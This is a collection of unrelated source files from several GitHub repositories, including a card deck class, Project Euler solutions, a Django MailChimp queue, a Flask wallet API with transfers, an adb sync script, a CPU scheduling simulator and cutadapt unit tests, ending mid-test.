index += 1
return temp
def shuffle(self, times = 50):
if times <= 0:
return
remaining_cards = len(self)
# switch 2 random cards n times
for i in range(times):
a = random.randint(0, remaining_cards - 1)
b = random.randint(0, remaining_cards - 1)
self._cards[a], self._cards[b] = self._cards[b], self._cards[a]
def pop_card(self, position = 0):
"""
Get the card and removes it from the deck
:param position : get the card from the top of the deck
:return (value,seed) if position is valid else it returns None
"""
card = self.watch_card(position)
if card:
self._cards.pop(position) # using list method to remove the first one
return card
def watch_card(self, position = 0):
"""
Get the card and don't removes it from the deck
:param position: get the card from the top of the deck
:return: (value,seed) if position is valid else it returns None
"""
if 0 <= position < len(self):
return self._cards[position]
else:
return None
def all_cards(self) -> []:
"""
Create a copy lit of all cards contained in this deck and returns it
:return: copy list with all cards in deck
"""
# return self._cards.copy()
return self._cards[:] # faster copy list
``` |
{
"source": "JohnConnor94/Project-Euler",
"score": 4
} |
#### File: problem-001/Python/main.py
```python
def sol1(limit) -> int:
"""
Simple solution with for, C-stylish
"""
total = 0
for x in range(limit):
if x % 3 == 0 or x % 5 == 0:
total += x
return total
def sol2(limit) -> int:
"""
A little more pythonic solution with list comprehension to generate the list
"""
total = 0
numbers = [x for x in range(limit) if x % 3 == 0 or x % 5 == 0]
for x in numbers:
total += x
return total
def sol3(limtit) -> int:
"""
A third implementation it could be made with iterators to avoid instatiating a list
"""
// implementation
pass
def main():
limit = 1000
print(sol1(limit))
print(sol2(limit))
pass
main()
``` |
{
"source": "johncosta/django-mailchimp",
"score": 2
} |
#### File: django-mailchimp/mailchimp/models.py
```python
from django.db import models
from django.utils import simplejson
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.core.urlresolvers import reverse
from django.shortcuts import get_object_or_404
from django.utils.translation import ugettext_lazy as _
from mailchimp.utils import get_connection
class QueueManager(models.Manager):
def queue(self, campaign_type, contents, list_id, template_id, subject,
from_email, from_name, to_email, folder_id=None, tracking_opens=True,
tracking_html_clicks=True, tracking_text_clicks=False, title=None,
authenticate=False, google_analytics=None, auto_footer=False,
auto_tweet=False, segment_options=False, segment_options_all=True,
segment_options_conditions=[], type_opts={}, obj=None, extra_info=[]):
"""
Queue a campaign
"""
kwargs = locals().copy()
kwargs['segment_options_conditions'] = simplejson.dumps(segment_options_conditions)
kwargs['type_opts'] = simplejson.dumps(type_opts)
kwargs['contents'] = simplejson.dumps(contents)
kwargs['extra_info'] = simplejson.dumps(extra_info)
for thing in ('template_id', 'list_id'):
thingy = kwargs[thing]
if hasattr(thingy, 'id'):
kwargs[thing] = thingy.id
del kwargs['self']
del kwargs['obj']
if obj:
kwargs['object_id'] = obj.pk
kwargs['content_type'] = ContentType.objects.get_for_model(obj)
return self.create(**kwargs)
def dequeue(self, limit=None):
if limit:
qs = self.filter(locked=False)[:limit]
else:
qs = self.filter(locked=False)
for obj in qs:
yield obj.send()
def get_or_404(self, *args, **kwargs):
return get_object_or_404(self.model, *args, **kwargs)
class Queue(models.Model):
"""
A FIFO queue for async sending of campaigns
"""
campaign_type = models.CharField(max_length=50)
contents = models.TextField()
list_id = models.CharField(max_length=50)
template_id = models.PositiveIntegerField()
subject = models.CharField(max_length=255)
from_email = models.EmailField()
from_name = models.CharField(max_length=255)
to_email = models.EmailField()
folder_id = models.CharField(max_length=50, null=True, blank=True)
tracking_opens = models.BooleanField(default=True)
tracking_html_clicks = models.BooleanField(default=True)
tracking_text_clicks = models.BooleanField(default=False)
title = models.CharField(max_length=255, null=True, blank=True)
authenticate = models.BooleanField(default=False)
google_analytics = models.CharField(max_length=100, blank=True, null=True)
auto_footer = models.BooleanField(default=False)
generate_text = models.BooleanField(default=False)
auto_tweet = models.BooleanField(default=False)
segment_options = models.BooleanField(default=False)
segment_options_all = models.BooleanField()
segment_options_conditions = models.TextField()
type_opts = models.TextField()
content_type = models.ForeignKey(ContentType, null=True, blank=True)
object_id = models.PositiveIntegerField(null=True, blank=True)
content_object = generic.GenericForeignKey('content_type', 'object_id')
extra_info = models.TextField(null=True)
locked = models.BooleanField(default=False)
objects = QueueManager()
def send(self):
"""
send (schedule) this queued object
"""
# check lock
if self.locked:
return False
# aquire lock
self.locked = True
self.save()
# get connection and send the mails
c = get_connection()
tpl = c.get_template_by_id(self.template_id)
content_data = dict([(str(k), v) for k,v in simplejson.loads(self.contents).items()])
built_template = tpl.build(**content_data)
tracking = {'opens': self.tracking_opens,
'html_clicks': self.tracking_html_clicks,
'text_clicks': self.tracking_text_clicks}
if self.google_analytics:
analytics = {'google': self.google_analytics}
else:
analytics = {}
segment_opts = {'match': 'all' if self.segment_options_all else 'any',
'conditions': simplejson.loads(self.segment_options_conditions)}
type_opts = simplejson.loads(self.type_opts)
title = self.title or self.subject
camp = c.create_campaign(self.campaign_type, c.get_list_by_id(self.list_id),
built_template, self.subject, self.from_email, self.from_name,
self.to_email, self.folder_id, tracking, title, self.authenticate,
analytics, self.auto_footer, self.generate_text, self.auto_tweet,
segment_opts, type_opts)
if camp.send_now_async():
self.delete()
kwargs = {}
if self.content_type and self.object_id:
kwargs['content_type'] = self.content_type
kwargs['object_id'] = self.object_id
if self.extra_info:
kwargs['extra_info'] = simplejson.loads(self.extra_info)
return Campaign.objects.create(camp.id, segment_opts, **kwargs)
# release lock if failed
self.locked = False
self.save()
return False
def get_dequeue_url(self):
return reverse('mailchimp_dequeue', kwargs={'id': self.id})
def get_cancel_url(self):
return reverse('mailchimp_cancel', kwargs={'id': self.id})
def get_list(self):
return get_connection().lists[self.list_id]
@property
def object(self):
"""
The object might have vanished until now, so triple check that it's there!
"""
if self.object_id:
model = self.content_type.model_class()
try:
return model.objects.get(id=self.object_id)
except model.DoesNotExist:
return None
return None
def get_object_admin_url(self):
if not self.object:
return ''
name = 'admin:%s_%s_change' % (self.object._meta.app_label,
self.object._meta.module_name)
return reverse(name, args=(self.object.pk,))
def can_dequeue(self, user):
if user.is_superuser:
return True
if not user.is_staff:
return False
if callable(getattr(self.object, 'mailchimp_can_dequeue', None)):
return self.object.mailchimp_can_dequeue(user)
return user.has_perm('mailchimp.can_send') and user.has_perm('mailchimp.can_dequeue')
class CampaignManager(models.Manager):
def create(self, campaign_id, segment_opts, content_type=None, object_id=None,
extra_info=[]):
con = get_connection()
camp = con.get_campaign_by_id(campaign_id)
extra_info = simplejson.dumps(extra_info)
obj = self.model(content=camp.content, campaign_id=campaign_id,
name=camp.title, content_type=content_type, object_id=object_id,
extra_info=extra_info)
obj.save()
segment_opts = dict([(str(k), v) for k,v in segment_opts.items()])
for email in camp.list.filter_members(segment_opts):
Reciever.objects.create(campaign=obj, email=email)
return obj
def get_or_404(self, *args, **kwargs):
return get_object_or_404(self.model, *args, **kwargs)
class DeletedCampaign(object):
subject = u'<deleted from mailchimp>'
class Campaign(models.Model):
sent_date = models.DateTimeField(auto_now_add=True)
campaign_id = models.CharField(max_length=50)
content = models.TextField()
name = models.CharField(max_length=255)
content_type = models.ForeignKey(ContentType, null=True, blank=True)
object_id = models.PositiveIntegerField(null=True, blank=True)
content_object = generic.GenericForeignKey('content_type', 'object_id')
extra_info = models.TextField(null=True)
objects = CampaignManager()
class Meta:
ordering = ['-sent_date']
permissions = [('can_view', 'Can view Mailchimp information'),
('can_send', 'Can send Mailchimp newsletters')]
verbose_name = _('Mailchimp Log')
verbose_name_plural = _('Mailchimp Logs')
def get_absolute_url(self):
return reverse('mailchimp_campaign_info', kwargs={'campaign_id': self.campaign_id})
def get_object_admin_url(self):
if not self.object:
return ''
name = 'admin:%s_%s_change' % (self.object._meta.app_label,
self.object._meta.module_name)
return reverse(name, args=(self.object.pk,))
def get_extra_info(self):
if self.extra_info:
return simplejson.loads(self.extra_info)
return []
@property
def object(self):
"""
The object might have vanished until now, so triple check that it's there!
"""
if self.object_id:
model = self.content_type.model_class()
try:
return model.objects.get(id=self.object_id)
except model.DoesNotExist:
return None
return None
@property
def mc(self):
try:
if not hasattr(self, '_mc'):
self._mc = get_connection().get_campaign_by_id(self.campaign_id)
return self._mc
except:
return DeletedCampaign()
class Reciever(models.Model):
campaign = models.ForeignKey(Campaign, related_name='recievers')
email = models.EmailField()
``` |
{
"source": "johncosta/readthedocs.org",
"score": 2
} |
#### File: readthedocs/restapi/views.py
```python
from django.shortcuts import get_object_or_404
from distlib.version import UnsupportedVersionError
from rest_framework import permissions
from rest_framework import viewsets
from rest_framework.decorators import link
from rest_framework.renderers import JSONRenderer, BrowsableAPIRenderer
from rest_framework.response import Response
from betterversion.better import version_windows, BetterVersion
from projects.models import Project, EmailHook
from .serializers import ProjectSerializer
from .permissions import RelatedProjectIsOwner
class ProjectViewSet(viewsets.ModelViewSet):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
renderer_classes = (JSONRenderer, BrowsableAPIRenderer)
model = Project
@link()
def valid_versions(self, request, **kwargs):
"""
Maintain state of versions that are wanted.
"""
project = get_object_or_404(Project, pk=kwargs['pk'])
if not project.num_major or not project.num_minor or not project.num_point:
return Response({'error': 'Project does not support point version control.'})
versions = []
for ver in project.versions.all():
try:
versions.append(BetterVersion(ver.verbose_name))
except UnsupportedVersionError:
# Probably a branch
pass
active_versions = version_windows(
versions,
major=project.num_major,
minor=project.num_minor,
point=project.num_point,
flat=True,
)
version_strings = [v._string for v in active_versions]
# Disable making old versions inactive for now.
#project.versions.exclude(verbose_name__in=version_strings).update(active=False)
project.versions.filter(verbose_name__in=version_strings).update(active=True)
return Response({
'flat': version_strings,
})
@link()
def translations(self, request, **kwargs):
project = get_object_or_404(Project, pk=kwargs['pk'])
queryset = project.translations.all()
return Response({
'translations': ProjectSerializer(queryset, many=True).data
})
class NotificationViewSet(viewsets.ModelViewSet):
permission_classes = (permissions.IsAuthenticated, RelatedProjectIsOwner)
renderer_classes = (JSONRenderer, BrowsableAPIRenderer)
model = EmailHook
def get_queryset(self):
"""
This view should return a list of all the purchases
for the currently authenticated user.
"""
user = self.request.user
if user.is_superuser:
return self.model.objects.all()
return self.model.objects.filter(project__users__in=[user.pk])
``` |
{
"source": "JohnCrash/scrollshade",
"score": 2
} |
#### File: scrollshade/pythongreen/www.py
```python
import zmq
import json
from flask import Flask,escape,request,url_for,redirect,abort
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://localhost:5555")
app = Flask(__name__)
def sendCommand(obj):
socket.send(json.dumps(obj))
return socket.recv()
@app.route('/')
def index():
return redirect('/static/index.html')
#取当前温度以及风扇和加速器状态
@app.route('/state')
def state():
s = sendCommand({'cmd':'state'})
return s
#强制打开风扇和加速器一定时间
@app.route('/force/<device>')
def set(device):
s = sendCommand({'cmd':'set','arg':[device]})
print(s)
return s
``` |
{
"source": "JohnCrash/SDLnanovg",
"score": 3
} |
#### File: build/android/adbsyn.py
```python
import os
import json
def push(local,remote):
return os.system('adb push '+local+' '+remote)
def pull(local,remote):
return os.system('adb pull '+remote+' '+local)
def restart(intent):
return os.system('adb shell am start -S '+intent)
def fordir(proot,dir,func,param1,param2):
fmd = 0
if os.path.isdir(proot) == False:
print "[",proot,"] is not a dirpath"
else:
plist = os.listdir(proot+"/"+dir)
for d in plist:
child = proot+"/"+dir+"/"+d
if True == os.path.isdir(child):
fmd = max(fmd,fordir(proot,dir+"/"+d,func,param1,param2))
else:
fmd = max(fmd,func(proot,dir+"/"+d,param1,param2))
return fmd
def push_func(root,file,remote,prevdate):
try:
fmd = os.path.getmtime(root+file)
# print "getmtime : "+root+file+":"+str(fmd)
except OSError as e:
return 0
if fmd > prevdate :
push(root+file,remote+file)
return fmd
else:
return 0
def push_directory(local,remote,prevdate):
return fordir(local,"",push_func,remote,prevdate)
cwd = os.path.dirname(os.path.realpath(__file__))
update_file = cwd+"/.adbsyn"
def get_prev_update_time():
try:
update_date_file = open(update_file,"rb")
update_date = json.loads(update_date_file.read())
update = update_date["update"]
update_date_file.close()
return update
except IOError:
print "Can't read file " + update_file
return 0
def set_prev_update_time(t):
try:
if t > 0 :
update_date_file = open(update_file,'wb')
update_date_file.write(json.dumps({"update":t}))
update_date_file.close()
except IOError:
print "Can't write file " + update_file
if __name__ == "__main__":
set_prev_update_time( push_directory(cwd+"/assets/lua","/sdcard/SDLnanovg/lua",get_prev_update_time()) )
restart("org.libsdl.nanovg/.nanovgActivity")
os.system("adb logcat -s SDL SDL/APP nanovg")
``` |
{
"source": "JohnCrickett/CommandoMaths",
"score": 3
} |
#### File: CommandoMaths/commandomaths/screen.py
```python
import pygame
def init_screen():
# TODO get screen size and size window based on it
# display_info = pygame.display.Info()
# print(display_info)
size = 1280, 800
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Commando Maths")
return screen
``` |
{
"source": "JohnCrickett/HC",
"score": 3
} |
#### File: JohnCrickett/HC/router.py
```python
import argparse
from router.router import RouteCalculator, JourneyError
from router.network import Network, load_network
def main():
parser = argparse.ArgumentParser(description='Routing.')
parser.add_argument('--network',
help='the name of the network file to route over',
required=True
)
parser.add_argument('--journeytime',
nargs="+",
help='the journey to validate / cost',
)
parser.add_argument('--shortesttime',
nargs="+",
help='the journey to calculate / cost',
)
parser.add_argument('--hoplimit',
nargs="+",
help='the journey hop limit',
)
parser.add_argument('--timelimit',
nargs="+",
help='the journey time limit',
)
args = parser.parse_args()
# the network is required so we can assume we have filename here
# and try to load it
network = load_network(args.network)
# now lets see what the user wants to do with the netwoek
# determine a journey time for a specified route
if args.journeytime != None:
try:
rc = RouteCalculator(network)
time = rc.calculate_journey_time(args.journeytime)
print("Journey time is: %d" % time)
except JourneyError as e:
print(e)
# calculate the shortest route for a specified src/dest pair
if args.shortesttime != None:
try:
rc = RouteCalculator(network)
route = rc.calculate_shortest_path(args.shortesttime[0], args.shortesttime[1])
time = rc.calculate_journey_time(route)
print("Journey time is: %d" % time)
print("Route is: " + ', '.join(route))
except JourneyError as e:
print(e)
# get all routes from src to dest that are within hoplimit
if args.hoplimit != None:
rc = RouteCalculator(network)
# TODO
# get all routes from src to dest that are within limit
if args.timelimit != None:
rc = RouteCalculator(network)
# TODO
if __name__ == '__main__':
main()
```
#### File: HC/test/test_network.py
```python
import unittest
import env
from router.network import load_network, Network, NetworkError
class TestNetwork(unittest.TestCase):
def setUp(self):
pass
def test_load(self):
network = load_network('./data/network.txt') # TODO mock this
self.assertEqual(network.size(), 9)
reachable_from_Buenos_Aires = network.reachable_from("Buenos Aires")
self.assertCountEqual(reachable_from_Buenos_Aires,
["Cape Town", "Casablanca", "New York"])
def test_add_link(self):
network = Network()
network.add_link("A", "B", 5)
network.add_link("C", "B", 6)
network.add_link("A", "C", 5)
reachable_from_A = network.reachable_from("A")
self.assertEqual(len(reachable_from_A), 2)
self.assertCountEqual(reachable_from_A, ["B", "C"])
def test_add_circular_link(self):
network = Network()
with self.assertRaises(NetworkError):
network.add_link("B", "B", 5)
def test_add_nonnumeric_link(self):
network = Network()
with self.assertRaises(ValueError):
network.add_link("B", "C", 'c')
def test_cost(self):
network = Network()
network.add_link("A", "B", 5)
self.assertEqual(network.link_cost("A", "B"), 5)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "JohnCrickett/OLEx",
"score": 2
} |
#### File: JohnCrickett/OLEx/app.py
```python
from collections import defaultdict
#import MySQLdb # this is not available on windows for anaconda and python 3.4
from bs4 import BeautifulSoup
import operator
import os
from tornado.httpclient import AsyncHTTPClient
import tornado.ioloop
import tornado.web
from tornado.options import define, options
define("port", default=8888, help="run on the given port", type=int)
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.render("templates/form.html", title="OLEx App")
@tornado.web.asynchronous
def post(self):
self.write("Your URL is: " + self.get_argument('url', ''))
http_client = AsyncHTTPClient()
http_client.fetch(self.get_argument('url', ''),
callback=self.on_fetch)
def on_fetch(self, response):
if response.error:
print("Error:", response.error)
self.render("templates/error.html", title="OLEx App", message = response.error)
else:
soup = BeautifulSoup(response.body)
for script in soup(["script", "style"]):
script.extract()
wordmap = self.generate_wordmap(soup.get_text())
top100 = sorted(wordmap.items(), key=operator.itemgetter(1), reverse=True)[:100]
self.render("templates/result.html", title="OLEx App", content = top100)
def generate_wordmap(self, text):
words = text.split()
counts = defaultdict(int)
for word in words:
counts[word] += 1
return counts
def make_app():
settings = {'debug': True,
'static_path': os.path.join(os.path.dirname(__file__), "static")
}
return tornado.web.Application([
(r"/", MainHandler),
], **settings)
if __name__ == "__main__":
app = make_app()
app.listen(options.port)
tornado.ioloop.IOLoop.current().start()
``` |
{
"source": "JohnCrickett/WalletAPI",
"score": 3
} |
#### File: WalletAPI/wallet_api/api.py
```python
from typing import Optional, Tuple
from flask import Blueprint, current_app, g, jsonify, Response, request
from flask_httpauth import HTTPBasicAuth
import sqlite3
from werkzeug.security import check_password_hash
from wallet_api.db import get_db
auth = HTTPBasicAuth()
bp = Blueprint(
"wallet", __name__, url_prefix="/wallet", static_folder="static"
)
@auth.verify_password
def verify_password(username: str, password: str) -> bool:
"""
Verify the provided user credentials.
Args:
username -- the username of the user to be verified.
password -- their password.
Returns:
True/False for the validity of the credentials
"""
db = get_db()
sql = "SELECT id, password FROM users WHERE username = ?"
result = db.execute(sql, (username,)).fetchone()
if result is not None:
g.user = result["id"]
if check_password_hash(result["password"], password):
return True
current_app.logger.debug(f"Unauthorised access attempt by {username}")
return False
@bp.route("/transfer", methods=["POST"])
@auth.login_required
def transfer() -> Tuple[dict, Optional[int]]:
"""
Handle requests to transfer funds, expects to receive JSON data
containing the receiver's username and the amount, i.e.:
{
"receiver": "john",
"amount": 100
}
The sender is the currently authenticated user.
"""
if request.json.keys() < {"amount", "receiver"}:
return (
jsonify(
error="Invalid request, please provide both receiver and amount"
),
400,
)
receiver_username = request.json["receiver"]
amount = request.json["amount"]
if not type(amount) is int:
return (
jsonify(
error="Invalid amount provided, please ensure the correct type is used."
),
400,
)
if amount <= 0:
return (
jsonify(error="Transfer amount must be greater than zero."),
403,
)
db = get_db()
sql = "SELECT id FROM users WHERE username = ?"
result = db.execute(sql, (receiver_username,)).fetchone()
if result is not None:
receiver_id = result["id"]
# only commit or rollback all updates and ensure the sender has
# sufficient balanace before proceeding.
db.isolation_level = None
c = db.cursor()
c.execute("begin")
try:
sql = "SELECT balance FROM users WHERE id = ?"
result = c.execute(sql, (g.user,)).fetchone()
if int(result["balance"]) < amount:
raise ValueError("Insufficient funds for transfer")
c.execute(
"UPDATE users SET balance = balance + ? WHERE id = ?",
(amount, receiver_id),
)
c.execute(
"UPDATE users SET balance = balance - ? WHERE id = ?",
(amount, g.user),
)
c.execute(
"INSERT INTO transactions (sender_id, receiver_id, value) "
"VALUES (?,?,?);",
(g.user, receiver_id, amount),
)
c.execute("commit")
except sqlite3.Error as e:
current_app.logger.error(f"Transaction failed: {e}")
c.execute("rollback")
return jsonify(error="Unable to complete transaction"), 500
except ValueError:
return jsonify(error="Insufficient funds for transfer"), 403
c.execute("rollback")
return jsonify(success="True")
return jsonify(error="Invalid User Provided"), 400
@bp.route("/balance", methods=["GET"])
@auth.login_required
def balance() -> Response:
"""
Handle balanace requests for the currently authenticated user.
"""
db = get_db()
sql = "SELECT balance FROM users WHERE id = ?"
result = db.execute(sql, (g.user,)).fetchone()
return jsonify({"balance": result["balance"]})
@bp.route("/transactions", methods=["GET"])
@auth.login_required
def transactions() -> Response:
"""
Handle transaction requests for the currently authenticated user.
"""
db = get_db()
sql = (
"SELECT "
"transaction_timestamp, "
"value, "
"s.username as sender, "
"r.username as receiver "
"FROM transactions "
"LEFT JOIN users s on s.id = transactions.sender_id "
"LEFT JOIN users r on r.id = transactions.receiver_id "
"WHERE sender_id = ? OR receiver_id = ?"
)
result = db.execute(sql, (g.user, g.user)).fetchall()
transactions = {
"transactions": [
{
"sender": row["sender"],
"receiver": row["receiver"],
"date": row["transaction_timestamp"],
"amount": row["value"],
}
for row in result
]
}
return jsonify(transactions)
@bp.route("/documentation", methods=["GET"])
def documentation() -> Response:
"""
Send the OpenAPI documentation to the client.
"""
return bp.send_static_file("openapispec.html")
```
#### File: WalletAPI/wallet_api/__init__.py
```python
from os import makedirs
from os.path import join
from typing import Union
from flask import Flask
from wallet_api.db import init_app
from wallet_api.api import bp
def create_app(test_config: Union[dict, None] = None) -> Flask:
"""Create the Flask application"""
app = Flask(__name__, instance_relative_config=True)
database_path = join(app.instance_path, "wallet.sqlite")
app.config.from_mapping(DATABASE=database_path)
if test_config is None:
app.config.from_pyfile("config.py", silent=True)
else:
app.config.from_mapping(test_config)
# ensure the instance folder exists
makedirs(app.instance_path, exist_ok=True)
init_app(app)
app.register_blueprint(bp)
app.logger.info("Wallet API Server Started Up")
return app
``` |
{
"source": "JohnCrickett/WebScraper",
"score": 3
} |
#### File: WebScraper/test/echo_server.py
```python
from flask import Flask
from flask import request
app = Flask(__name__)
@app.route('/', methods=['GET'])
def echo():
return "This is my Flask Test Server"
if __name__ == '__main__':
app.run(port=8000)
``` |
{
"source": "johncs00/CPU-Scheduling-Sim",
"score": 4
} |
#### File: johncs00/CPU-Scheduling-Sim/cpusim.py
```python
import sys
import time
import random as rand
import math
def burstnumber(input):
input = input * 100
input = math.trunc(input)
input += 1
return input
print("Testing")
r = rand.random()
print(r)
bursttest = 0.0856756876765
bursttest = burstnumber(bursttest)
print(bursttest, "This should be 9")
min = 0
max = 0
sum = 0
#replace l with argv[3]
#replace upperbound with argv[4]
iterations = 10000000
l = 0.001
upperbound = 3000
for i in range(iterations):
#replace random() with drand48
r = rand.random() #/ * uniform # dist[0.00, 1.00) -- also check out random() * /
x = -math.log(r) / l# / lambda; / * log() is natural log * /
# / * avoid values that are far down the "long tail" of the distribution * /
if (x > upperbound):
i -= 1
continue
if (i < 20):
print("x is ", x)
sum += x
if (i == 0 or x < min):
min = x
if ( i == 0 or x > max ):
max = x
avg = sum / iterations
print( "minimum value: ", min)
print( "maximum value: ", max)
print( "average value: ", avg)
```
#### File: johncs00/CPU-Scheduling-Sim/process.py
```python
class Process:
def __init__(self, name, cpu_time, io_time, state, turn_time, wait_time):
self.n = name
self.cpu = cpu_time
self.io = io_time
self.s = state
self.turn = turn_time
self.wait = wait_time
def getName():
return self.n
def setName(name):
self.n = name
def getCpu():
return self.cpu
def setCpu(cpu_time):
self.cpu = cpu_time
def getIo():
return self.io
def setIo(io_time):
self.io = io_time
def getState():
return self.s
def setState(state):
self.s = state
``` |
{
"source": "JohnCSW/simple-rest-api",
"score": 2
} |
#### File: simple-rest-api/common/entity_serializer.py
```python
from flask import jsonify
def serialize_entity(func):
def inner():
return jsonify(func())
return inner
```
#### File: simple-rest-api/repo/base_repo.py
```python
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, Query
from entity.customer import Customer
engine = create_engine(
'mysql+pymysql://root:for-root-test-only@localhost:3306/classicmodels'
)
Session = sessionmaker(bind=engine)
class BaseRepo:
def __init__(self):
self.session = Session()
def find_all(self, query):
return query.with_session(self.session).all()
```
#### File: repo/query/customer_query_builder.py
```python
from .base_query_bulder import BaseQueryBuilder
from entity.customer import Customer
class CustomerQueryBuilder(BaseQueryBuilder):
def __init__(self):
super().__init__([Customer])
def first_name(self, first_name):
if first_name:
self.query = self.query.filter(
Customer.contactFirstName == first_name
)
return self
def last_name(self, last_name):
if last_name:
self.query = self.query.filter(
Customer.contactLastName == last_name
)
return self
def order_by_credit_limit(self, enabled):
if enabled:
self.query = self.query.order_by(Customer.creditLimit)
return self
```
#### File: repo/query/order_query_bulder.py
```python
from entity.customer import Customer
from entity.order import Order
from repo.query.base_query_bulder import BaseQueryBuilder
class OrderQueryBuilder(BaseQueryBuilder):
def __init__(self):
super().__init__([Order])
self.query = self.query.join(Customer)
def cust_first_name(self, first_name):
if first_name:
self.query = self.query.filter(
Customer.contactFirstName == first_name
)
return self
def cust_last_name(self, last_name):
if last_name:
self.query = self.query.filter(
Customer.contactLastName == last_name
)
return self
def order_by_date(self, enabled):
if enabled:
self.query = self.query.order_by(Order.orderDate)
return self
def order_by_cust_last_name(self, enabled):
if enabled:
self.query = self.query.order_by(Customer.contactLastName)
return self
``` |
{
"source": "johncthomas/keepadapt",
"score": 2
} |
#### File: keepadapt/tests/testadapters.py
```python
from __future__ import print_function, division, absolute_import
from nose.tools import raises, assert_raises
from cutadapt.seqio import Sequence
from cutadapt.adapters import (Adapter, Match, ColorspaceAdapter, FRONT, BACK,
parse_braces, LinkedAdapter)
def test_issue_52():
adapter = Adapter(
sequence='GAACTCCAGTCACNNNNN',
where=BACK,
max_error_rate=0.12,
min_overlap=5,
read_wildcards=False,
adapter_wildcards=True)
read = Sequence(name="abc", sequence='CCCCAGAACTACAGTCCCGGC')
am = Match(astart=0, astop=17, rstart=5, rstop=21, matches=15, errors=2,
remove_before=False, adapter=adapter, read=read)
assert am.wildcards() == 'GGC'
"""
The result above should actually be 'CGGC' since the correct
alignment is this one:
adapter GAACTCCAGTCACNNNNN
mismatches X X
read CCCCAGAACTACAGTC-CCGGC
Since we do not keep the alignment, guessing 'GGC' is the best we
can currently do.
"""
def test_issue_80():
# This issue turned out to not be an actual issue with the alignment
# algorithm. The following alignment is found because it has more matches
# than the 'obvious' one:
#
# TCGTATGCCGTCTTC
# =========X==XX=
# TCGTATGCCCTC--C
#
# This is correct, albeit a little surprising, since an alignment without
# indels would have only two errors.
adapter = Adapter(
sequence="TCGTATGCCGTCTTC",
where=BACK,
max_error_rate=0.2,
min_overlap=3,
read_wildcards=False,
adapter_wildcards=False)
read = Sequence(name="seq2", sequence="TCGTATGCCCTCC")
result = adapter.match_to(read)
assert result.errors == 3, result
assert result.astart == 0, result
assert result.astop == 15, result
def test_str():
a = Adapter('ACGT', where=BACK, max_error_rate=0.1)
str(a)
str(a.match_to(Sequence(name='seq', sequence='TTACGT')))
ca = ColorspaceAdapter('0123', where=BACK, max_error_rate=0.1)
str(ca)
@raises(ValueError)
def test_color():
ColorspaceAdapter('0123', where=FRONT, max_error_rate=0.1)
def test_parse_braces():
assert parse_braces('') == ''
assert parse_braces('A') == 'A'
assert parse_braces('A{0}') == ''
assert parse_braces('A{1}') == 'A'
assert parse_braces('A{2}') == 'AA'
assert parse_braces('A{2}C') == 'AAC'
assert parse_braces('ACGTN{3}TGACCC') == 'ACGTNNNTGACCC'
assert parse_braces('ACGTN{10}TGACCC') == 'ACGTNNNNNNNNNNTGACCC'
assert parse_braces('ACGTN{3}TGA{4}CCC') == 'ACGTNNNTGAAAACCC'
assert parse_braces('ACGTN{0}TGA{4}CCC') == 'ACGTTGAAAACCC'
def test_parse_braces_fail():
for expression in ['{', '}', '{}', '{5', '{1}', 'A{-7}', 'A{', 'A{1', 'N{7', 'AN{7', 'A{4{}',
'A{4}{3}', 'A{b}', 'A{6X}', 'A{X6}']:
assert_raises(ValueError, lambda: parse_braces(expression))
def test_linked_adapter():
linked_adapter = LinkedAdapter('AAAA', 'TTTT', min_overlap=4)
assert linked_adapter.front_adapter.min_overlap == 4
assert linked_adapter.back_adapter.min_overlap == 4
sequence = Sequence(name='seq', sequence='AAAACCCCCTTTT')
trimmed = linked_adapter.match_to(sequence).trimmed()
assert trimmed.name == 'seq'
assert trimmed.sequence == 'CCCCC'
def test_info_record():
adapter = Adapter(
sequence='GAACTCCAGTCACNNNNN',
where=BACK,
max_error_rate=0.12,
min_overlap=5,
read_wildcards=False,
adapter_wildcards=True,
name="Foo")
read = Sequence(name="abc", sequence='CCCCAGAACTACAGTCCCGGC')
am = Match(astart=0, astop=17, rstart=5, rstop=21, matches=15, errors=2, remove_before=False,
adapter=adapter, read=read)
assert am.get_info_record() == (
"abc",
2,
5,
21,
'CCCCA',
'GAACTACAGTCCCGGC',
'',
'Foo',
'',
'',
''
)
def test_random_match_probabilities():
a = Adapter('A', where=BACK, max_error_rate=0.1)
assert a.random_match_probabilities(0.5) == [1, 0.25]
assert a.random_match_probabilities(0.2) == [1, 0.4]
for s in ('ACTG', 'XMWH'):
a = Adapter(s, where=BACK, max_error_rate=0.1)
assert a.random_match_probabilities(0.5) == [1, 0.25, 0.25**2, 0.25**3, 0.25**4]
assert a.random_match_probabilities(0.2) == [1, 0.4, 0.4*0.1, 0.4*0.1*0.4, 0.4*0.1*0.4*0.1]
a = Adapter('GTCA', where=FRONT, max_error_rate=0.1)
assert a.random_match_probabilities(0.5) == [1, 0.25, 0.25**2, 0.25**3, 0.25**4]
assert a.random_match_probabilities(0.2) == [1, 0.4, 0.4*0.1, 0.4*0.1*0.4, 0.4*0.1*0.4*0.1]
```
#### File: keepadapt/tests/testtrim.py
```python
from __future__ import print_function, division, absolute_import
from cutadapt.seqio import ColorspaceSequence, Sequence
from cutadapt.adapters import Adapter, ColorspaceAdapter, PREFIX, BACK
from cutadapt.modifiers import AdapterCutter
def test_cs_5p():
read = ColorspaceSequence("name", "0123", "DEFG", "T")
adapter = ColorspaceAdapter("CG", PREFIX, 0.1)
cutter = AdapterCutter([adapter])
trimmed_read = cutter(read)
# no assertion here, just make sure the above code runs without
# an exception
def test_statistics():
read = Sequence('name', 'AAAACCCCAAAA')
adapters = [Adapter('CCCC', BACK, 0.1)]
cutter = AdapterCutter(adapters, times=3)
trimmed_read = cutter(read)
# TODO make this a lot simpler
trimmed_bp = 0
for adapter in adapters:
for d in (cutter.adapter_statistics[adapter].lengths_front, cutter.adapter_statistics[adapter].lengths_back):
trimmed_bp += sum(seqlen * count for (seqlen, count) in d.items())
assert trimmed_bp <= len(read), trimmed_bp
def test_end_trim_with_mismatch():
"""
Test the not-so-obvious case where an adapter of length 13 is trimmed from
the end of a sequence with overlap 9 and there is one deletion.
In this case the algorithm starts with 10 bases of the adapter to get
the hit and so the match is considered good. An insertion or substitution
at the same spot is not a match.
"""
adapter = Adapter('TCGATCGATCGAT', BACK, 0.1)
read = Sequence('foo1', 'AAAAAAAAAAATCGTCGATC')
cutter = AdapterCutter([adapter], times=1)
